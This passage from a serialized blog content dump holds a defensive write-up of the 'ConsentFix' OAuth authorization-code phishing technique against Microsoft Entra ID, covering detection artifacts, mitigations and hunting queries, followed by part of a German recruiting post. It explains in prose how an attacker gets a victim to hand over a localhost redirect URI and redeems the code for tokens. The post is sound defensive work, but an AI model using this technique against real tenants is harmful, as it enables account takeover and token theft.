This port is used as a so called reply URI.",[806,5534,5535,5536,5541],{},"You can easily reproduce this yourself, for example by using ",[833,5537,5540],{"href":5538,"rel":5539},"https://github.com/f-bader/TokenTacticsV2",[1410],"TokenTacticsV2",", or by crafting the URI manually.",[806,5543,5544],{},[1449,5545],{"alt":5540,"src":5546},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-02.png",[806,5548,5549,5550,5554],{},"After the user successfully signs into Entra ID, the user is redirected to the reply URI, e.g., ",[833,5551,5552],{"href":5552,"rel":5553},"http://localhost:3001",[1410],". In a normal scenario, the Azure CLI would now accept the call to this URI and would receive the important and critical information that is part of the redirect:",[2738,5556,5557,5567],{},[2741,5558,5559,5561,5563,5564,5566],{},[1736,5560,1524],{},[2016,5562],{},"\nThis is the authorization_code, which the application uses to request a bearer token, which consists of access, ID, and optionally the refresh token.",[2016,5565],{},"\nAccording to the documentation, this code is valid for around 10 minutes and must be redeemed within this time.",[2741,5568,5569,5572,5574],{},[1736,5570,5571],{},"state",[2016,5573],{},"\nThis is an optional parameter, and the application should verify whether it is identical in the request and response.",[806,5576,5577],{},"In the attack scenario, the user is also redirected, but since no application is running on localhost, the browser encounters an error.",[806,5579,5580],{},[1449,5581],{"alt":5582,"src":5583},"The browser runs into an error","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-03.png",[806,5585,5586],{},"But the URI still contains the sensitive information and this is what the attacker wants the user to provide them. 
If the user obliges the attacker will now redeem the token material and can then use the access and refresh token to access the resource, in this case Azure Resource Manager.",[806,5588,5589],{},"In this screenshot you will see how to retrieve the bearer token using the URI provided by the user.",[806,5591,5592],{},[1449,5593],{"alt":5594,"src":5595},"Bearer token using the URI provided by the user","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-04.png",[3587,5597,5598],{},[806,5599,5600],{},"If you want to test your detections, make sure you execute the last step from a different system, in a different network.",[810,5602,5604],{"id":5603},"detection-artifacts","Detection artifacts",[806,5606,5607,5608,5611,5612,5615],{},"When you reproduce the attack and check the ",[1524,5609,5610],{},"SigninLogs"," and ",[1524,5613,5614],{},"AADNonInteractiveUserSignInLogs",", you'll see two events for this single sign-in activity. The first event represents the actual user sign-in, while the second originates from the attacker's infrastructure.",[806,5617,5618],{},[1449,5619],{"alt":5620,"src":5621},"Activity Log","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-05.png",[806,5623,5624],{},"The big difference is that the first event is an interactive sign in event, while the second is non-interactive. This translates to the two stages of the authentication flow: first the user, then the application or in our case the attacker.",[806,5626,5627],{},"Regular behavior of the Azure CLI would be that both sign-in events originate from the same IP address. However, in our case the IP addresses are different, and they originate from different countries. 
Of course, the latter is not a reliable indicator, as the attacker could reside in the same country as the victim to hide their tracks.",[1671,5629,5631],{"id":5630},"missing-link","Missing link",[806,5633,5634],{},"When looking for a good way to link those two events, the natural first idea was to check the Unique Token Identifier (UTI). However, Microsoft uses different values for the authorization code UTI and the bearer token UTI, so this approach doesn't work as a reliable link.",[806,5636,5637],{},[1449,5638],{"alt":5639,"src":5640},"Unique Token Identifier","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-06.png",[806,5642,5643,5644,5647],{},"However, the ",[1524,5645,5646],{},"SessionId"," is a good link between the two, though it is a long-running ID and might contain multiple of these event combinations, even legitimate ones.",[806,5649,5650],{},"With the additional knowledge of the auth code flow limitations and the user and application id as additional links you can use time as an important detection factor:",[2738,5652,5653,5656,5659,5662,5665,5668],{},[2741,5654,5655],{},"Both events share the same SessionId",[2741,5657,5658],{},"Both events share the same ApplicationId",[2741,5660,5661],{},"Both events share the same UserId",[2741,5663,5664],{},"The second event must be after the first event",[2741,5666,5667],{},"The second event must be within approximately a 10-minute time window after the first event. You should not use exactly 10 minutes as Microsoft writes \"[...] they expire after about 10 minutes\"",[2741,5669,5670],{},"You should only consider the very next second event, not subsequent ones",[3587,5672,5673],{},[806,5674,5675,5678,5680],{},[1736,5676,5677],{},"Fun fact",[2016,5679],{},"\nThe ResourceIdentity is not a good link, as the attacker can change the resource since it is not bound to the auth code. 
The targeted application ID cannot be changed.",[810,5682,5684],{"id":5683},"reduce-the-noise","Reduce the noise",[806,5686,5687],{},"This knowledge already provided us with a good working detection, but there were benign positives in the mix as well. Modern developers use cloud resources that appear like local instances, but result in irregular login patterns in the logs.",[806,5689,5690],{},"The key difference is the time component. While the attack requires user interaction to copy and paste or drag and drop the URI, the GitHub Codespace use case we identified as the source of the benign positive alerts is completely automated and redeems the auth code within mere seconds.",[806,5692,5693],{},"So filtering out anything that does this authentication dance within a few seconds can most likely be removed as benign.",[806,5695,5696],{},"Another source of noise could be changing egress points for your internet traffic, especially in SD-WAN, ZTNA or Secure Web Gateway scenarios.",[810,5698,5700],{"id":5699},"affected-first-party-applications","Affected first-party applications",[806,5702,5703],{},"While the initial report shows \"Microsoft Azure CLI\" as the abused application there are a lot of different Microsoft first-party apps with pre-consent in every tenant that offer localhost as redirect. And not only those are a target. 
The attacker could also abuse reply URLs of test and dev environments that are not publicly resolvable.",[806,5705,5706],{},"Here is a list of the most notable applications that also have high pre-consented permissions on resources.",[2738,5708,5709,5712,5715,5718,5721],{},[2741,5710,5711],{},"Microsoft Azure CLI (04b07795-8ddb-461a-bbee-02f9e1bf7b46)",[2741,5713,5714],{},"Microsoft Azure PowerShell (1950a258-227b-4e31-a9cf-717495945fc2)",[2741,5716,5717],{},"Visual Studio (04f0c124-f2bc-4f59-8241-bf6df9866bbd)",[2741,5719,5720],{},"Visual Studio Code (aebc6443-996d-45c2-90f0-388ff96faa56)",[2741,5722,5723],{},"MS Teams PowerShell Cmdlets (12128f48-ec9e-42f0-b203-ea49fb6af367)",[806,5725,5726,5727,5732],{},"A full list of these apps is now included in ",[833,5728,5731],{"href":5729,"rel":5730},"https://entrascopes.com/?authcodeFix=true",[1410],"EntraScopes.com"," by our colleague Fabian Bader.",[810,5734,5736],{"id":5735},"mitigations-and-protections","Mitigations and Protections",[1671,5738,5740],{"id":5739},"limit-the-attack-surface-and-audience","Limit the attack surface and audience",[1541,5742,5745,5748,5749,5751,5754,5755,5757,5760],{"className":5743},[5744],"option-block",[1736,5746,5747],{},"Deployment effort:"," Low to High (depends on effort to identify legitimate users)",[2016,5750],{},[1736,5752,5753],{},"Mitigation:"," Medium (reduces the potential audience for the attack)",[2016,5756],{},[1736,5758,5759],{},"Scope:"," limited\n",[1671,5762,5764],{"id":5763},"option-1-require-user-assignment","Option 1: Require User Assignment",[5766,5767,5769],"h4",{"id":5768},"pre-requisites","Pre-requisites:",[2738,5771,5772,5775,5778],{},[2741,5773,5774],{},"Add the service principal for affected first-party apps by using Microsoft Graph API or PowerShell",[2741,5776,5777],{},"Apply the user assignment requirement on the service principal object using Microsoft Graph API or PowerShell",[2741,5779,5780],{},"Establish a process to assign users upon request via Access Packages, 
PIM-for-Groups (for just-in-time access), or a combination of both.",[3604,5782,5783],{},"\n.code-block {\n  background-color: #f6f8fa;\n  padding: 0 16px 16px 16px;\n  border-radius: 6px;\n  font-family: Menlo, Consolas, Monaco, \"Courier New\", monospace;\n  font-size: 14px;\n  line-height: 1.5;\n  overflow-x: auto;\n  white-space: pre;\n  border: 1px solid #d0d7de;\n}\n",[1545,5785,5787],{"className":5786},[2009],[1524,5788,5789],{},"\n# Example for Microsoft Graph PowerShell\nConnect-MgGraph -Identity\n$AppId = \"04b07795-8ddb-461a-bbee-02f9e1bf7b46\" # Microsoft Azure CLI\n$sp = Get-MgServicePrincipal -Filter \"appId eq '$AppId'\"\n# $true enforces the user assignment requirement described above; $false would remove it\nUpdate-MgServicePrincipal -ServicePrincipalId $sp.Id -AppRoleAssignmentRequired:$true\n",[5766,5791,5793],{"id":5792},"benefit","Benefit:",[2738,5795,5796,5799,5802,5805],{},[2741,5797,5798],{},"Enables management of user assignments through Access Packages or manual group membership to limit exposure to this attack technique.",[2741,5800,5801],{},"Option to provide just-in-time access combined with eligible group membership assignment, allowing temporary access to CLI tools and thereby further reducing the attack surface.",[2741,5803,5804],{},"Applied before evaluating Conditional Access policies.",[2741,5806,5807],{},"Limits the attack surface for other scenarios as well.",[5766,5809,5811],{"id":5810},"disadvantage","Disadvantage:",[2738,5813,5814,5817,5820],{},[2741,5815,5816],{},"Can only be scoped to specific users and not combined with other requirements like usage of specific devices",[2741,5818,5819],{},"All legitimate CLI tool users must be identified",[2741,5821,5822],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins.",[1671,5824,5826],{"id":5825},"option-2-block-access-by-using-conditional-access-policies","Option 2: Block access by using Conditional Access Policies",[5766,5828,5769],{"id":5829},"pre-requisites-1",[2738,5831,5832,5835],{},[2741,5833,5834],{},"Create a 
Conditional Access policy to block access to CLI tools, excluding legitimate users, by targeting \"Microsoft Graph Command Line Tools\" and \"Windows Azure Service Management API\"",[2741,5836,5837],{},"Manage exclusions via group membership, either manually or through entitlement management (e.g., Access Packages).",[5766,5839,5793],{"id":5840},"benefit-1",[2738,5842,5843,5846],{},[2741,5844,5845],{},"Prevents token issuance for non-legitimate or non-privileged users.",[2741,5847,5848],{},"Allows granular scoping based on additional conditions such as device or network.",[5766,5850,5811],{"id":5851},"disadvantage-1",[2738,5853,5854,5857],{},[2741,5855,5856],{},"All legitimate CLI tool users must be identified and excluded.",[2741,5858,5859],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode.",[1671,5861,5863],{"id":5862},"block-token-issuance-by-authorization-code-flow","Block token issuance by authorization code flow",[3604,5865,5866],{},"\n.option-block {\n  background-color: #f6f8fa;\n  padding: 16px;\n  margin-bottom:2rem;\n  border-radius: 6px;\n  overflow-x: auto;\n  border: 1px solid #d0d7de;\n}\n",[1541,5868,5870,5873,5874,5876,5878,5879,5881,5878,5883,5885,5887],{"className":5869},[5744],[1736,5871,5872],{},"Option:"," Require Token Protection",[2016,5875],{},[1736,5877,5747],{}," High",[2016,5880],{},[1736,5882,5753],{},[2016,5884],{},[1736,5886,5759],{}," Very limited\n",[5766,5889,5769],{"id":5890},"pre-requisites-2",[2738,5892,5893,5896,5899,5918],{},[2741,5894,5895],{},"Microsoft Entra ID P1 licenses",[2741,5897,5898],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows platform",[2741,5900,5901,5902,2289,5907,5611,5912,5917],{},"Enable Web Account Manager (WAM) in 
",[833,5903,5906],{"href":5904,"rel":5905},"https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli-interactively?view=azure-cli-latest#sign-in-with-web-account-manager-wam-on-windows",[1410],"Azure CLI",[833,5908,5911],{"href":5909,"rel":5910},"https://learn.microsoft.com/en-us/powershell/azure/configure-global-settings?view=azps-15.1.0#web-account-manager-wam",[1410],"Azure PowerShell",[833,5913,5916],{"href":5914,"rel":5915},"https://learn.microsoft.com/en-us/powershell/module/microsoft.graph.authentication/set-mggraphoption?view=graph-powershell-1.0#set-web-account-manager-support",[1410],"Microsoft Graph PowerShell"," (default in latest versions)",[2741,5919,5920,5921],{},"Configure Conditional Access targeting:\n",[2738,5922,5923,5937,5944],{},[2741,5924,5925,5926],{},"Cloud App targeting to the following apps:\n",[2738,5927,5928,5931,5934],{},[2741,5929,5930],{},"Office 365 Exchange Online",[2741,5932,5933],{},"Office 365 SharePoint Online",[2741,5935,5936],{},"Microsoft Teams Services",[2741,5938,5939,5940,5943],{},"Client apps under ",[4655,5941,5942],{},"Mobile apps and desktop clients"," to require Token Protection.",[2741,5945,5946,5947,5950,5951,5954],{},"Select ",[4655,5948,5949],{},"Windows"," as ",[4655,5952,5953],{},"device platform"," for targeting the policy",[5766,5956,5793],{"id":5957},"benefit-2",[806,5959,5960],{},"Microsoft Entra’s token protection requires proof‑of‑possession (PoP), which can only be enforced when the client communicates directly with a trusted token broker such as the Web Account Manager (WAM) on Windows. 
Because browsers cannot establish this secure channel, the authorization code flow initiated in a browser is blocked under token protection policies.",[806,5962,5963],{},"When the policy enforces token protection that requires broker‑managed PoP, the authorization code returned to a browser cannot be redeemed because the browser cannot produce the required broker‑signed proof during the code to token exchange",[806,5965,5966],{},"In this case, attacks with AuthCodeFix will be fully mitigated as long the application can be protected by Token Protection.",[806,5968,5969],{},"As shown in the screenshot below, Token Protection successfully mitigates the redemption of the authorization code flow initiated by the victim through a phishing action.",[806,5971,5972],{},[1449,5973],{"alt":5974,"src":5975},"Token Protection successfully mitigates the redemption of the authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-07.png",[5766,5977,5811],{"id":5978},"disadvantage-2",[2738,5980,5981,6011,6014,6017],{},[2741,5982,5983,5984],{},"Only the following resources are officially supported:\n",[2738,5985,5986,5988,5990],{},[2741,5987,5930],{},[2741,5989,5933],{},[2741,5991,5936,5992,5994,5996,5997,5611,6000,6004,6005,6010],{},[2016,5993],{},[2016,5995],{},"\nThe Microsoft Graph API is indirectly covered by the previously mentioned resources and Microsoft Graph PowerShell is listed as a supported client. We were able to verify in our testing that the attack for this scenario will be mitigated. “Windows Azure Service Management API\" is not listed as a supported resource. Both CLI clients (",[833,5998,5906],{"href":5904,"rel":5999},[1410],[833,6001,5911],{"href":6002,"rel":6003},"https://learn.microsoft.com/en-us/powershell/azure/authenticate-interactive?view=azps-15.1.0#benefits-of-wam",[1410],") support WAM which is a client-side requirement to use Token Protection. 
Microsoft has announced ",[833,6006,6009],{"href":6007,"rel":6008},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/4062700",[1410],"in a blog post"," that it will extend token protection capabilities to Azure management scenarios.",[2741,6012,6013],{},"Some bugs in Microsoft Graph PowerShell force you to temporarily disable WAM integration",[2741,6015,6016],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode. The cloud app targeting will also affect productivity access to Microsoft 365.",[2741,6018,6019],{},"Limited scope due to availability on supported platforms and Entra ID–integrated devices.",[1671,6021,6023],{"id":6022},"block-further-token-issuance-by-compliant-network-check-or-trusted-network","Block further token issuance by compliant network check or trusted network",[1541,6025,6027,6029,6030,6032,6029,6034,6036,6038],{"className":6026},[5744],[1736,6028,5747],{}," Medium",[2016,6031],{},[1736,6033,5753],{},[2016,6035],{},[1736,6037,5759],{}," Broad\n",[1671,6040,6042],{"id":6041},"option-block-access-outside-of-compliant-network-with-global-secure-access","Option: Block access outside of Compliant network with Global Secure Access",[5766,6044,6046],{"id":6045},"pre-requisite","Pre-requisite:",[2738,6048,6049,6052,6055,6058],{},[2741,6050,6051],{},"Entra ID P1 license",[2741,6053,6054],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows, macOS, Android and iOS platform",[2741,6056,6057],{},"Global Secure Access Client on all affected clients and enabled Entra Internet Access for M365 Traffic Profile",[2741,6059,6060],{},"Conditional Access Policy to enforce network compliant check should be applied to all cloud apps",[5766,6062,5793],{"id":6063},"benefit-3",[806,6065,6066],{},"Block additional token issuance by enforcing a trusted network check. 
This mitigation ensures attackers cannot obtain new tokens using the refresh token from the authorization code flow. However, it does not prevent the initial redemption of the authorization code or the issuance of the first access token, which remains valid outside the compliant network because it was originally requested by the victim.",[3587,6068,6069],{},[806,6070,6071],{},"Enforcing GSA with the Compliant Network condition also blocks other Token Replay scenarios and adds additional logs which can be very useful for detections and hunting.",[5766,6073,5811],{"id":6074},"disadvantage-3",[2738,6076,6077,6080,6083],{},[2741,6078,6079],{},"Only applicable for users and devices with deployed Global Secure Access client",[2741,6081,6082],{},"Limited scope due to availability on Entra ID–integrated devices",[2741,6084,6085],{},"Enforcing Compliant Networks via CA will need some Exclusions like Intune to avoid chicken-egg-problems. Detailed testing is needed before rollout",[810,6087,6089],{"id":6088},"hunting-queries","Hunting queries",[806,6091,6092,6093,6096],{},"Once all the prerequisites for token theft mitigations are met - such as deploying the GSA client (including ingestion of ",[1524,6094,6095],{},"NetworkAccessTraffic"," logs) and taking benefit of WAM authentication - we gain additional options for threat hunting and verification.",[1671,6098,6100],{"id":6099},"leveraging-gsa-logs-and-wam-authentication-for-hunting-or-verify-confidence-on-detection-results","Leveraging GSA Logs and WAM Authentication for hunting or verify confidence on detection results",[806,6102,6103,6104,6106],{},"This hunting query leverages ",[1524,6105,6095],{}," logs from Global Secure Access (GSA), which include the initiating process for communication with the Microsoft Entra token endpoint. 
This helps determine whether a token request originated directly from a browser and also whether any additional token requests were made outside the GSA network.",[3587,6108,6109],{},[806,6110,6111],{},"This query works and delivers only reliable results when the prerequisites are met; otherwise, it leads to a high false-positive rate.",[806,6113,6114,6117,6118,6121,6122,6125],{},[1736,6115,6116],{},"Why this matters:"," When signing in via CLI or PowerShell modules using Web Account Manager (WAM) on Windows Devices, the flow does not involve a browser-based authorization code. This sign-in behavior is the default in the latest version. Therefore, if the initiating process is a browser executable (e.g., ",[1524,6119,6120],{},"msedge.exe","), this is a strong indicator of suspicious activity. On macOS, the process is initiated by the Company Portal app (",[1524,6123,6124],{},"com.microsoft.CompanyPortalMac.ssoextension",")  when using Platform SSO.",[806,6127,6128,6131],{},[1736,6129,6130],{},"Token Binding and PoP:"," WAM authentication typically binds tokens to the device by enforcing Proof-of-Possession (PoP). 
Without the device's PoP key, an attacker cannot obtain further device-bound tokens, so the appearance of an unbound refresh token is another strong indicator.",[806,6133,6134,6137],{},[1736,6135,6136],{},"Limitations:"," All the mentioned signals are only available when the accessing device is registered with or joined to Microsoft Entra ID.",[806,6139,6140,6143],{},[1736,6141,6142],{},"Confidence Score Logic:"," The query combines multiple signals to calculate a confidence score:",[2738,6145,6146,6149,6152],{},[2741,6147,6148],{},"Presence of a browser process initiating token requests.",[2741,6150,6151],{},"Detection of a downgrade to unbound tokens.",[2741,6153,6154],{},"Network provider changes (including compliant to non-compliant) between sign-ins.",[806,6156,6157],{},"These signals can be used in the query to hunt for activity or to derive a confidence score in the event of an incident based on the previous detection.",[806,6159,6160],{},[1449,6161],{"alt":6162,"src":6163},"Signals for the hunting query","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-08.png",[806,6165,6166],{},"The following scoring will be shown depending on the conditions:",[806,6168,6169,6172,6173,6175,6176,6178,6180,6183,6184,6186,6188,6191],{},[1736,6170,6171],{},"A very high confidence score"," is displayed when ",[1524,6174,6095],{}," logs show that the token request was initiated by a browser process instead of the expected client process, and a downgrade to an unbound token has been detected.",[2016,6177],{},[2016,6179],{},[1736,6181,6182],{},"A high confidence score"," is shown when the sign-in occurs from a different network provider (ASN) on a non-compliant network and involves unbound tokens.",[2016,6185],{},[2016,6187],{},[1736,6189,6190],{},"A medium confidence score"," is shown when only a change in network provider and compliant network is identified, along with a change in the token type used.",[806,6193,6194,6195,2786],{},"You’ll find the latest version of the hunting query on 
",[833,6196,6199],{"href":6197,"rel":6198},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-Authentication/ConsentFix-HuntingConfidenceOnTokenAndNetworkSignals.kusto",[1410],"GitHub",[1671,6201,6203],{"id":6202},"hunting-for-activities-by-issued-tokens","Hunting for activities by issued tokens",[806,6205,6206,6207,6212,6213,6216,6217,6219,6220,6223],{},"You should consider expanding your investigation beyond sign-in events to include activities performed using tokens issued by the attacker. Our colleague Thomas Naunheim has ",[833,6208,6211],{"href":6209,"rel":6210},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-TokenHunting/MicrosoftCloudActivity.func",[1410],"published a KQL function"," called ",[1524,6214,6215],{},"MicrosoftCloudActivity",", which can assist in this extended hunting process. Additionally, the affected ",[1524,6218,5646],{}," can be correlated with suspicious ",[1524,6221,6222],{},"UniqueId"," values identified during previous hunts for deeper analysis.",[806,6225,6226],{},[1449,6227],{"alt":6228,"src":6229},"KQL function","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-09.png",[806,6231,6232],{},"In this example, the attacker leveraged the refresh token obtained during the attack to issue an access token for the Microsoft Graph API. This token was then used to maintain persistent access and lateral movement by adding a client secret to an application owned by the victim. 
The query provides details about the Graph API operation, including the token protection status and whether the operation occurred outside the Global Secure Access network.",[806,6234,6235],{},[1449,6236],{"alt":6237,"src":6238},"Graph API operation screenshot","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-10.png",[810,6240,6242],{"id":6241},"further-reading","Further Reading",[2738,6244,6245,6252,6259,6266],{},[2741,6246,6247],{},[833,6248,6251],{"href":6249,"rel":6250},"https://pushsecurity.com/blog/consentfix",[1410],"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants - PushSecurity",[2741,6253,6254],{},[833,6255,6258],{"href":6256,"rel":6257},"https://youtu.be/AAiiIY-Soak",[1410],"Hacking Endpoint to Identity (Microsoft 365): \"ConsentFix\" - YouTube",[2741,6260,6261],{},[833,6262,6265],{"href":6263,"rel":6264},"https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow",[1410],"Microsoft identity platform and OAuth 2.0 authorization code flow",[2741,6267,6268],{},[833,6269,6272],{"href":6270,"rel":6271},"https://entrascopes.com/?appId=04b07795-8ddb-461a-bbee-02f9e1bf7b46",[1410],"Microsoft Azure CLI on 
entrascopes.com",{"title":863,"searchDepth":864,"depth":864,"links":6274},[6275,6278,6279,6280,6288,6292],{"id":5603,"depth":864,"text":5604,"children":6276},[6277],{"id":5630,"depth":1814,"text":5631},{"id":5683,"depth":864,"text":5684},{"id":5699,"depth":864,"text":5700},{"id":5735,"depth":864,"text":5736,"children":6281},[6282,6283,6284,6285,6286,6287],{"id":5739,"depth":1814,"text":5740},{"id":5763,"depth":1814,"text":5764},{"id":5825,"depth":1814,"text":5826},{"id":5862,"depth":1814,"text":5863},{"id":6022,"depth":1814,"text":6023},{"id":6041,"depth":1814,"text":6042},{"id":6088,"depth":864,"text":6089,"children":6289},[6290,6291],{"id":6099,"depth":1814,"text":6100},{"id":6202,"depth":1814,"text":6203},{"id":6241,"depth":864,"text":6242},{"lang":4,"seoTitle":6294,"titleClass":873,"date":6295,"categories":6296,"blogtitlepic":6297,"socialimg":6298,"customExcerpt":6299,"keywords":6300,"hreflang":6301,"scripts":6306,"asideNav":6307,"maxContent":508,"published":508},"ConsentFix: How a New OAuth Attack Bypasses Microsoft Entra Conditional Access","2025-12-31",[371],"head-consentfix","/heads/head-consentfix.jpg","Just before year's end, ConsentFix emerges: a clever OAuth-based attack that abuses legitimate authentication flows to steal the authorization code, effectively handing attackers the keys to Microsoft Entra. 
We break down why this works despite Conditional Access, which signals it leaves behind in the logs, and how defenders can detect and stop it before real damage is done.","ConsentFix attack, OAuth authorization code theft, Microsoft Entra OAuth attack, Azure CLI token abuse, Entra ID Conditional Access bypass, authorization code phishing, token replay attack Azure, Proof of Possession tokens, WAM authentication security, Azure sign-in log analysis, detect OAuth attacks Entra, Azure identity threat hunting, Global Secure Access token protection, Microsoft Entra security detection",[6302,6304],{"lang":4,"href":6303},"/de/posts/2025-12-31-vulnerability-consentfix",{"lang":956,"href":6305},"/es/posts/2025-12-31-vulnerability-consentfix",{"slick":508,"form":508},{"menuItems":6308},[6309,6311,6313,6315,6317,6319],{"href":6310,"text":5604},"#detection-artifacts",{"href":6312,"text":5684},"#reduce-the-noise",{"href":6314,"text":5700},"#affected-first-party-applications",{"href":6316,"text":5736},"#mitigations-and-protections",{"href":6318,"text":6089},"#hunting-queries",{"href":6320,"text":6242},"#further-reading","/posts/2025-12-31-vulnerability-consentfix",{"title":5508,"description":5514},"posts/2025-12-31-vulnerability-consentfix",[6325,6326,432],"OAuth 2.0","Microsoft Entra ID","XvJUqR9SZe2cwDgWD9NSLNg9R7zTOjKgxmJFBjxBTX4",{"id":6329,"title":6330,"author":6331,"body":6332,"cta":764,"description":6336,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":6433,"moment":6435,"navigation":508,"path":6447,"seo":6448,"stem":6449,"tags":6450,"webcast":749,"__hash__":6452},"content_de/posts/2025-12-08-recruiting-process.md","Ein Teil vom Glück: So läuft unser Bewerbungs&shy;prozess ab",[1243],{"type":803,"value":6333,"toc":6425},[6334,6337,6340,6343,6354,6358,6360,6363,6366,6370,6372,6375,6386,6389,6393,6395,6398,6402,6404,6407,6411,6413,6416,6420,6422],[806,6335,6336],{},"Oft werden wir gefragt: Was muss ich mitbringen? 
Was ist euch wichtig?",[806,6338,6339],{},"Vielleicht so viel: Wir mögen Menschen, die Lust haben, in einer Tech-Welt unterwegs zu sein, die sich jeden Tag ein Stück weiterdreht. Wir sehen uns als ein Team, das gemeinsam an einem Strang zieht.",[806,6341,6342],{},"Und wir suchen Menschen, die Technik genauso begeistert wie uns:",[2738,6344,1905,6345,1905,6348,1905,6351],{},[2741,6346,6347],{},"die Herausforderungen nicht scheuen, sondern darin aufgehen, wenn sie tief in komplexe Themen eintauchen können.",[2741,6349,6350],{},"die den Status Quo hinterfragen und mit Leidenschaft neue, innovative Lösungen entwickeln für glueckkanja und unsere Kunden.",[2741,6352,6353],{},"die gerne Teil einer Community sind, ihr Wissen teilen und voneinander lernen möchten.",[810,6355,6357],{"id":6356},"schritt-1-deine-bewerbung","Schritt 1: Deine Bewerbung",[806,6359,816],{},[806,6361,6362],{},"Du hast deine Unterlagen abgeschickt, der erste Schritt ist getan! Bei uns prüft keine KI deine Bewerbung, sondern unser Recruiting-Team persönlich. Du fragst dich, wer sich hinter dem Recruiting Team verbirgt? Here we are!",[806,6364,6365],{},"Wir, das sind Kerstin, Anna, Steffi und Jan, nehmen uns Zeit, deinen CV genau anzuschauen und prüfen, ob deine Erfahrung und Skills zu unseren Anforderungen passen. Unser Ziel: Du bekommst innerhalb von 1-2 Wochen, meistens sogar schon nach ein paar Tagen, eine Rückmeldung von uns. Wir wissen, wie nervenaufreibend das Warten sein kann.",[810,6367,6369],{"id":6368},"schritt-2-kennenlernen-mit-people-culture","Schritt 2: Kennenlernen mit People & Culture",[806,6371,816],{},[806,6373,6374],{},"Wenn dein Profil passt, starten wir in die erste Runde. Keine Sorge, du musst nicht nervös sein! Du hast mit deinem CV bereits einen super ersten Eindruck hinterlassen. 
Im Gespräch möchten wir dich als Person kennenlernen:",[2738,6376,1905,6377,1905,6380,1905,6383],{},[2741,6378,6379],{},"Wer bist du?",[2741,6381,6382],{},"Was macht dich aus?",[2741,6384,6385],{},"Was suchst du für deine Zukunft?",[806,6387,6388],{},"Hier geht es um ein offenes, ehrliches Kennenlernen auf Augenhöhe.\n ",[810,6390,6392],{"id":6391},"schritt-3-fachlicher-austausch-mit-deinem-zukünftigen-lead","Schritt 3: Fachlicher Austausch mit deinem zukünftigen Lead",[806,6394,816],{},[806,6396,6397],{},"Im zweiten Gespräch lernst du deinen Lead kennen. Jetzt wird es etwas technischer: Wir sprechen über deine fachlichen Skills und du kannst alle Fragen zu Aufgaben, Team und Projekten stellen. Ein bisschen Aufregung gehört dazu – aber hey, du bist schon einen Schritt weiter!",[810,6399,6401],{"id":6400},"schritt-4-team-meet-culture-check","Schritt 4: Team-Meet & Culture Check",[806,6403,816],{},[806,6405,6406],{},"Bei glueckkanja ist Kultur mehr als ein Wort. Sie ist unser Alltag. Deshalb lernst du im letzten Step dein mögliches Team kennen. So stellen wir sicher, dass es für beide Seiten passt, fachlich wie menschlich.",[810,6408,6410],{"id":6409},"finale-dein-angebot","Finale: Dein Angebot",[806,6412,816],{},[806,6414,6415],{},"Du hast uns überzeugt? Dann folgt das persönliche Angebotsgespräch. Hier klären wir alle Details zum Angebot und beantworten deine abschließenden Fragen.",[810,6417,6419],{"id":6418},"warum-so-viele-schritte","Warum so viele Schritte?",[806,6421,816],{},[806,6423,6424],{},"Ganz einfach: Wir möchten sicherstellen, dass du dich bei uns wohlfühlst und wir gemeinsam erfolgreich sind. 
Unsere Gespräche finden immer auf Augenhöhe statt – und das „Du“ ist bei uns selbstverständlich.",{"title":863,"searchDepth":864,"depth":864,"links":6426},[6427,6428,6429,6430,6431,6432],{"id":6356,"depth":864,"text":6357},{"id":6368,"depth":864,"text":6369},{"id":6391,"depth":864,"text":6392},{"id":6400,"depth":864,"text":6401},{"id":6409,"depth":864,"text":6410},{"id":6418,"depth":864,"text":6419},{"lang":4,"seoTitle":6434,"titleClass":873,"date":6435,"categories":6436,"blogtitlepic":6437,"socialimg":6438,"customExcerpt":6439,"keywords":6440,"hreflang":6441,"scripts":6446},"Ein Teil vom Glück: So läuft der Bewerbungsprozess bei glueckkanja ab","2025-12-08",[876],"head-recruiting-process","/heads/head-recruiting-process.png","Du hast eine spannende Stelle bei uns entdeckt und möchtest dich bewerben? Super, wir freuen uns immer über neue Talente! Aber wie geht es nach dem Klick auf „Bewerbung absenden“ weiter? Hier geben wir dir einen Blick hinter die Kulissen.","Bewerbungsprozess glueckkanja, Recruiting IT Unternehmen, IT Jobs Deutschland, Karriere glueckkanja, Employer Branding IT, Bewerbung IT Branche, Tech Jobs, Recruiting Prozess IT, Arbeiten bei glueckkanja, IT Karriere, Talent Acquisition IT, People and Culture IT, Bewerbungsgespräch Tipps IT",[6442,6444],{"lang":953,"href":6443},"/en/posts/2025-12-08-recruiting-process.md",{"lang":956,"href":6445},"/es/posts/2025-12-08-recruiting-process.md",{"slick":508,"form":508},"/posts/2025-12-08-recruiting-process",{"title":6330,"description":6336},"posts/2025-12-08-recruiting-process",[1488,6451,1489],"Recruiting","MYU2dWOGbcnNm1z_SeJp7Ezgj4blki_92PJsGrB5vD4",{"id":6454,"title":6455,"author":6456,"body":6457,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":6535,"moment":6537,"navigation":508,"path":6582,"seo":6583,"stem":6584,"tags":6585,"webcast":749,"__hash__":6587},"content_de/posts/2025-11-12-partner-of-the-year-awards.md","Cloud-first am 